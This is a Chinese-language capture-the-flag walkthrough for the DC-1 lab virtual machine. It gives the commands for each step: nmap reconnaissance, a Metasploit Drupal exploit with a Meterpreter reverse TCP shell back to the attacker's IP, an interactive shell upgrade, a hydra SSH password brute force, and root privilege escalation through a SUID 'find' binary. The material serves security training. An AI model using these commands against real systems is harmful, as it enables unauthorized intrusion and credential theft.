DC-1靶机通关

DC-1靶机网盘链接：https://pan.baidu.com/s/1kfbn4SWCLY66n0d0-VOfRA 
提取码：lwoi

1、查看kali所属网段，靶机也要和kali所属在同一网段下，本人设置的是nat连接模式

查看以下DC-1的mac地址

kali使用nmap扫描全网段，这个IP地址的mac地址和DC-1的MAC地址一样，说明DC-1的ip地址就为192.168.72.166

nmap -sP 192.168.72.0/24
解释：
    -sP  #只进行主机发现扫描（ping扫描）,不执行端口扫描

对该ip地址进行详细的扫描，查看该靶机开放了哪些端口、提供了哪些服务

nmap -A -p- 192.168.72.166
解释：
    -A    #开启全面扫描模式
    -p-    #扫描目标主机的所有端口

发现该靶机开放了22（ssh）端口和80（http）端口以及111和39935端口

2、使用该ip地址访问一下网页，从网页显示内容来看猜测是用Drupal框架来写的网页

 3、kali使用msfconsole工具搜索有没有drupal框架的相关漏洞

 

4、使用编号为1的漏洞

1.set payload php/meterpreter/reverse_tcp        #设置php反弹shell
2.set RHOSTS 192.168.72.166        #设置被攻击的主机
3.set LHOST 192.168.72.134        #设置攻击成功以后返回的会话给哪个ip
4.exploit        #启动攻击

 

5、进去后查看一下有哪些文件可以利用的，发现一个flag1.txt,查看一下，但很遗憾没有可用的信息

6、在会话端输入shell 进入目标主机的shell界面

 7、利用python在当前终端中创建一个交互式的bash shell

python -c "import pty;pty.spawn('/bin/bash')"

 8、查看一下etc目录下的passwd文档，发现有一个flag4的用户

 9、进入/home/flag4用户的家目录下查看一下有没有什么可用的信息，在该目录下有一个flag4.txt文件，但cat查看了一下，没有什么可用的信息。

 10、在kali上重新打开一个新的终端，尝试爆破一下flag4用户的密码

hydra -l flag4 -P top1000.txt ssh://192.168.72.166
解释：
hydra    #一个工具的名字
-l        #hydra的选项之一，指定要尝试的用户名
-P        #hydra的选项之一，指定要尝试的密码文件
ssh     #表示通过ssh协议进行爆破

爆破出来的密码为orange

 11、利用ssh协议登录目标靶机,然后输入密码为orange

ssh flag4@192.168.72.166

 12、查找一下具有设置了SUID权限的文件

find / -perm -u=s -type f
解释：
/        #表示根目录
-perm    #表示匹配指定的文件权限
-u=s    #匹配具有设置了SUID权限的文件
-type f    #只匹配常规文件

当一个可执行文件具有SUID权限时，它在执行时将使用文件所有者的权限来运行，而不是执行它的用户的权限

 

 13、将/bin目录下的所有文件作为参数，并使用/bin/sh作为每个文件的执行命令

find /bin -exec "/bin/sh" \;
解释：
/bin    #在/bin目录下开始查找
-exec    #执行后面跟的命令

输入上述命令后，可以发现当前的权限已经变成了root用户的权限，这就表示提权成功

 14、进入root用户的家目录，得到最后的flag。